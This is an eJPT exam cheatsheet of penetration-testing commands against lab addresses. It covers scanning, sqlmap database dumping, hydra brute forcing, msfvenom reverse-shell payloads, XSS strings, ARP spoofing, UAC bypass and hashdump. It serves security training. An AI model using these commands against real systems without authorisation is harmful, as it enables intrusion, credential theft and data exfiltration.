eJPT_Cheatsheet.md

eJPT-Cheatsheet

This is a Cheatsheet for eJPT exam + course.

Nmap

nmap -sn 10.10.10.0/24 nmap -sV -p- -iL targets -oN nmap.initial -v nmap -A -p- -iL targets -oN nmap.aggressive -v nmap -p --script=vuln -v

fPing

fping -a -g 10.10.10.0/24 2>/dev/null > targets

IP Route

Syntax ip route add via dev eg. ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0

John

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 unshadow passwd shadow > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

dirb

dirb http://10.10.10.10/ dirb http://10.10.10.10/dir -u admin:admin

I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.

Netcat

Listening for reverse shell nc -nvlp 1234

Banner Grabbing

nc -nv 10.10.10.10

SQLMap

Check if injection exists sqlmap -r Post.req sqlmap -u "http://10.10.10.10/file.php?id=1" -p id sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"

Get database if injection Exists sqlmap -r login.req --dbs sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs\

Get Tables in a Database sqlmap -r login.req -D dbname --tables sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables

Get data in a Database tables sqlmap -r login.req -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump

Hydra

SSH Login Bruteforcing hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh You can use same for FTP, just replace ssh with ftp

HTTP POST Form hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V

You will know which wordlists to use when the time comes

XSS

<script>alert(1)</script> <ScRiPt>alert(1)</ScRiPt>

This is a great filter bypass cheatsheet https://owasp.org/www-community/xss-filter-evasion-cheatsheet

msfvenom shells

JSP Java Meterpreter Reverse TCP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

Metasploit Meterpreter autoroute

run autoroute -s 10.10.10.0/24

ARPSpoof

echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i -t -r arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36

SMB Enumeration

Get shares, users, groups, password policy smbclient -L //10.10.10.10/ enum4linux -U -M -S -P -G 10.10.10.10 nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v nmap -p445 --script=smb-vuln-* 10.10.10.10 -v

Access Share smbclient //10.10.10.10/share_name

FTP Enumeration

nmap --script=ftp-anon 10.10.10.10 -p21 -v nmap -A -p21 10.10.10.10 -v

Login to FTP server ftp 10.10.10.10

Meterpreter

ps getuid getpid getsystem ps -U SYSTEM

CHECK UAC/Privileges run post/windows/gather/win_privs

BYPASS UAC Background the session first exploit/windows/local/bypassuac set session

After PrivEsc migrate hashdump

Windows Command Line

To search for a file starting from current directory dir /b/s ".conf" dir /b/s ".txt" dir /b/s "filename"

Check routing table route print netstat -r

Check Users net users

List drives on the machine wmic logicaldisk get Caption,Description,providername